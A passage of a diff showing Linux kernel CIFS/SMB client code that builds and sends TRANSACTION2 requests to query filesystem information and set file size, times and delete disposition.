+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_ATTRIBUTE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in QFSAttributeInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			/* BB also check if enough bytes returned */
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_ATTRIBUTE_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsAttrInfo, response_data,
+-			       sizeof(FILE_SYSTEM_ATTRIBUTE_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSAttributeRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x104 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_DEVICE_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSDeviceInfo\n");
+-QFSDeviceRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_DEVICE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSDeviceInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) <
+-			  sizeof(FILE_SYSTEM_DEVICE_INFO))
+-			rc = -EIO;	/* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_DEVICE_INFO *)
+-				(((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsDevInfo, response_data,
+-			       sizeof(FILE_SYSTEM_DEVICE_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSDeviceRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x200  SMB_QUERY_CIFS_UNIX_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_UNIX_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSUnixInfo\n");
+-QFSUnixRetry:
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
+-				   (void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
+-			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_CIFS_UNIX_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in QFSUnixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_UNIX_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsUnixInfo, response_data,
+-			       sizeof(FILE_SYSTEM_UNIX_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSUnixRetry;
+-
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon, __u64 cap)
+-{
+-/* level 0x200  SMB_SET_CIFS_UNIX_INFO */
+-	TRANSACTION2_SETFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_SETFSI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In SETFSUnixInfo\n");
+-SETFSUnixRetry:
+-	/* BB switch to small buf init to save memory */
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
+-					(void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 4;	/* 2 bytes zero followed by info level. */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_setfsi_req, FileNum)
+-				- 4;
+-	offset = param_offset + params;
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FS_INFORMATION);
+-	byte_count = 1 /* pad */ + params + 12;
+-
+-	pSMB->DataCount = cpu_to_le16(12);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-
+-	/* Params. */
+-	pSMB->FileNum = 0;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_CIFS_UNIX_INFO);
+-
+-	/* Data. */
+-	pSMB->ClientUnixMajor = cpu_to_le16(CIFS_UNIX_MAJOR_VERSION);
+-	pSMB->ClientUnixMinor = cpu_to_le16(CIFS_UNIX_MINOR_VERSION);
+-	pSMB->ClientUnixCap = cpu_to_le64(cap);
+-
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in SETFSUnixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		if (rc)
+-			rc = -EIO;	/* bad smb */
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SETFSUnixRetry;
+-
+-	return rc;
+-}
+-
+-
+-
+-int
+-CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct kstatfs *FSData)
+-{
+-/* level 0x201  SMB_QUERY_CIFS_POSIX_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_POSIX_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSPosixInfo\n");
+-QFSPosixRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
+-			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_FS_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSUnixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_POSIX_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			FSData->f_bsize =
+-					le32_to_cpu(response_data->BlockSize);
+-			/*
+-			 * much prefer larger but if server doesn't report
+-			 * a valid size than 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-					le64_to_cpu(response_data->TotalBlocks);
+-			FSData->f_bfree =
+-			    le64_to_cpu(response_data->BlocksAvail);
+-			if (response_data->UserBlocksAvail == cpu_to_le64(-1)) {
+-				FSData->f_bavail = FSData->f_bfree;
+-			} else {
+-				FSData->f_bavail =
+-				    le64_to_cpu(response_data->UserBlocksAvail);
+-			}
+-			if (response_data->TotalFileNodes != cpu_to_le64(-1))
+-				FSData->f_files =
+-				     le64_to_cpu(response_data->TotalFileNodes);
+-			if (response_data->FreeFileNodes != cpu_to_le64(-1))
+-				FSData->f_ffree =
+-				      le64_to_cpu(response_data->FreeFileNodes);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSPosixRetry;
+-
+-	return rc;
+-}
+-
+-
+-/*
+- * We can not use write of zero bytes trick to set file size due to need for
+- * large file support. Also note that this SetPathInfo is preferred to
+- * SetFileInfo based method in next routine which is only needed to work around
+- * a sharing violation bugin Samba which this routine can run into.
+- */
+-int
+-CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *file_name, __u64 size, struct cifs_sb_info *cifs_sb,
+-	      bool set_allocation)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	struct file_end_of_file_info *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	__u16 params, byte_count, data_count, param_offset, offset;
+-
+-	cifs_dbg(FYI, "In SetEOF\n");
+-SetEOFRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
+-				       PATH_MAX, cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, file_name);
+-	}
+-	params = 6 + name_len;
+-	data_count = sizeof(struct file_end_of_file_info);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(4100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	if (set_allocation) {
+-		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
+-		else
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
+-	} else /* Set File Size */  {
+-	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
+-	    else
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
+-	}
+-
+-	parm_data =
+-	    (struct file_end_of_file_info *) (((char *) &pSMB->hdr.Protocol) +
+-				       offset);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + data_count;
+-	pSMB->DataCount = cpu_to_le16(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	parm_data->FileSize = cpu_to_le64(size);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (file size) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetEOFRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, __u64 size, bool set_allocation)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct file_end_of_file_info *parm_data;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "SetFileSize (via SetFileInfo) %lld\n",
+-		 (long long)size);
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)cfile->pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(cfile->pid >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	count = sizeof(struct file_end_of_file_info);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	parm_data =
+-		(struct file_end_of_file_info *)(((char *)pSMB) + offset + 4);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	parm_data->FileSize = cpu_to_le64(size);
+-	pSMB->Fid = cfile->fid.netfid;
+-	if (set_allocation) {
+-		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
+-		else
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
+-	} else /* Set File Size */  {
+-	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
+-	    else
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
+-	}
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in SetFileInfo (SetFileSize) = %d\n",
+-			 rc);
+-	}
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-/* Some legacy servers such as NT4 require that the file times be set on
+-   an open handle, rather than by pathname - this is awkward due to
+-   potential access conflicts on the open, but it is unavoidable for these
+-   old servers since the only other choice is to go from 100 nanosecond DCE
+-   time and resort to the original setpathinfo level which takes the ancient
+-   DOS time format with 2 second granularity */
+-int
+-CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		    const FILE_BASIC_INFO *data, __u16 fid, __u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set Times (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	data_offset = (char *)pSMB +
+-			offsetof(struct smb_hdr, Protocol) + offset;
+-
+-	count = sizeof(FILE_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
+-			 rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetFileDisposition(const unsigned int xid, struct cifs_tcon *tcon,
+-			  bool delete_file, __u16 fid, __u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set File Disposition (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)(pSMB) + offset + 4;
+-
+-	count = 1;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_DISPOSITION_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	*data_offset = delete_file ? 1 : 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetFileDisposition = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-static int
+-CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *fileName, const FILE_BASIC_INFO *data,
+-		     const struct nls_table *nls_codepage,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	int oplock = 0;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	int rc;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = fileName,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		goto out;
+-
+-	rc = CIFSSMBSetFileInfo(xid, tcon, data, fid.netfid, current->tgid);
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *fileName, const FILE_BASIC_INFO *data,
+-		   const struct nls_table *nls_codepage,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	char *data_offset;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In SetTimes\n");
+-
+-SetTimesRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(FILE_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	data_offset = (char *) (&pSMB->hdr.Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-
+-	pSMB->DataCount = cpu_to_le16(count);
